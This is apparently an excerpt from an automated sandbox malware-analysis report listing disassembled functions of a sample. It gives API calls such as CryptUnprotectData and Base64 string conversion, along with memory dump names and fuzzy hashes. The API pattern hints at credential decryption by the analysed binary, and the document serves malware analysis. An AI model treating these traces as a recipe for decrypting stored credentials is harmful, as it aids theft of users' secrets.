Function 00C7162C Relevance: 9.1, Strings: 6, Instructions: 1555COMMON

Download Yara Rule

Strings

ZC_, xrefs: 00C7231D
<H, xrefs: 00C722EE
t^', xrefs: 00C7173A
Sn., xrefs: 00C71E8B
3Ok, xrefs: 00C723AB
Rs>#, xrefs: 00C71F9B

Memory Dump Source

Source File: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 3Ok$Rs>#$Sn.$ZC_$t^'$<H
API String ID: 0-868551680
Opcode ID: c6615916f4650f63e03cb27d76e7b3cdec5039debf2810cf8dd7532f2d05c71c
Instruction ID: eb6908f7e2fadf9fc40ccf009ac70c9a5205fbf689d15f28becbf71c53633b4f
Opcode Fuzzy Hash: c6615916f4650f63e03cb27d76e7b3cdec5039debf2810cf8dd7532f2d05c71c
Instruction Fuzzy Hash: 2CB2D5F390C6009FE304AE2DDC8567ABBE5EF94720F168A3DEAC4C3744E63598058697

Function 00C767F3 Relevance: 7.9, Strings: 5, Instructions: 1611COMMON

Download Yara Rule

Strings

R~l, xrefs: 00C775C5
|^, xrefs: 00C7775A
Dl) , xrefs: 00C771AD
E(w-, xrefs: 00C77ADC
w\u{, xrefs: 00C770C9

Memory Dump Source

Source File: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: Dl) $E(w-$R~l$w\u{$|^
API String ID: 0-2148429907
Opcode ID: e0e44ca266f5bdd18fe6451508d2c04c540286d42db05cb3bc9bd4e5795285e4
Instruction ID: c7ebb0105b138b9aa4b829e8f7d28462fbf5e016aacff05f7327e07549ecc4ef
Opcode Fuzzy Hash: e0e44ca266f5bdd18fe6451508d2c04c540286d42db05cb3bc9bd4e5795285e4
Instruction Fuzzy Hash: 61B2F5F3A086009FE304AE2DEC8567AF7E5EF94720F1A493DE6C5D7344EA3598048697

Function 008A7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 008A724D
RtlAllocateHeap.NTDLL(00000000), ref: 008A7254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008A7281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 008A72A4
LocalFree.KERNEL32(?), ref: 008A72AE

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 56c5b61f26b4ecbb7862893ef03563e18852dd578fd3fde3313e355c0ded3cd7
Instruction ID: 8abec4025488858da9e0aeeda7ee5b955966cbe84070793ea19ec97fe0c92a5c
Opcode Fuzzy Hash: 56c5b61f26b4ecbb7862893ef03563e18852dd578fd3fde3313e355c0ded3cd7
Instruction Fuzzy Hash: D701ED75A40208BBEB10DBD4CD85F9D7778EB44704F104154FB05EA2C0D670BA018B65

Function 008B8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,008A5184,40000001,00000000,00000000,?,008A5184), ref: 008B8EC0

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: e9f406faf474bb6962a502096d7f239115340e858db5cfa46b7c1b40937c9722
Instruction ID: 5406991bc20d543c3865aca30c10182e944afa079e446539cd285b279b84af98
Opcode Fuzzy Hash: e9f406faf474bb6962a502096d7f239115340e858db5cfa46b7c1b40937c9722
Instruction Fuzzy Hash: 3E11B074200209EBDB00DFA4E885FAA37A9FF89714F109558F919CB350DB75E942DB61

Function 008A9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008A4EEE,00000000,00000000), ref: 008A9AEF
LocalAlloc.KERNEL32(00000040,?,?,?,008A4EEE,00000000,?), ref: 008A9B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008A4EEE,00000000,00000000), ref: 008A9B2A
LocalFree.KERNEL32(?,?,?,?,008A4EEE,00000000,?), ref: 008A9B3F

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 510967276e15e15ddcd72b6179079d6f21a2d57d71a045ea055268ae85b75cc8
Instruction ID: a8b58a435dc5fd7c5de5b2540089dd22846107e770a28c364c8caa25f438d212
Opcode Fuzzy Hash: 510967276e15e15ddcd72b6179079d6f21a2d57d71a045ea055268ae85b75cc8
Instruction Fuzzy Hash: 441174B4641208EFEB10CFA4DC95FAA77B5FB89714F208158F9159F390C775A942CB60

Function 008B7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008C0E00,00000000,?), ref: 008B79B0
RtlAllocateHeap.NTDLL(00000000), ref: 008B79B7
GetLocalTime.KERNEL32(?,?,?,?,?,008C0E00,00000000,?), ref: 008B79C4
wsprintfA.USER32 ref: 008B79F3

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: 2c5d0fe965bcef07770d088eed20f0c87d4f53f0d49e13c724c4b5fc5a1a7341
Instruction ID: 8d9f94cb033da58ae78c9c4b9409fd71142079350446f111856989ad1845dd75
Opcode Fuzzy Hash: 2c5d0fe965bcef07770d088eed20f0c87d4f53f0d49e13c724c4b5fc5a1a7341
Instruction Fuzzy Hash: FC112AB2904158ABCB14DFC9DD85BBEB7F8FB4CB11F10411AF605A2280E2395941C7B1

Function 008B3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(008BE118,00000000,00000001,008BE108,00000000), ref: 008B3758
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 008B37B0

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: 8dcddd3b9c769af43ded193e085ce7127d77e5fdc72976566acb405198b2e2f5
Instruction ID: 069aa6e751e635e0aba69efd2e4e5b37c2e4d80f17278e7cdc34f7537e27a62f
Opcode Fuzzy Hash: 8dcddd3b9c769af43ded193e085ce7127d77e5fdc72976566acb405198b2e2f5
Instruction Fuzzy Hash: B941F670A40A289FDB24DB58CC94BDBB7B5FB48702F4051D8E618EB290E771AE85CF51

Function 00C660D5 Relevance: 3.7, Strings: 2, Instructions: 1174COMMON

Download Yara Rule

Strings

@Yw, xrefs: 00C665FC
!l>, xrefs: 00C664CE

Memory Dump Source

Source File: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !l>$@Yw
API String ID: 0-1968670648
Opcode ID: 4a0099964843aab03c5f4a40943784be9d95f14059bbe78a54057765e04606a3
Instruction ID: f6be24f0fa401a622de432717c2ddad7c9905423a6753c07df5cacf6f5c98cfa
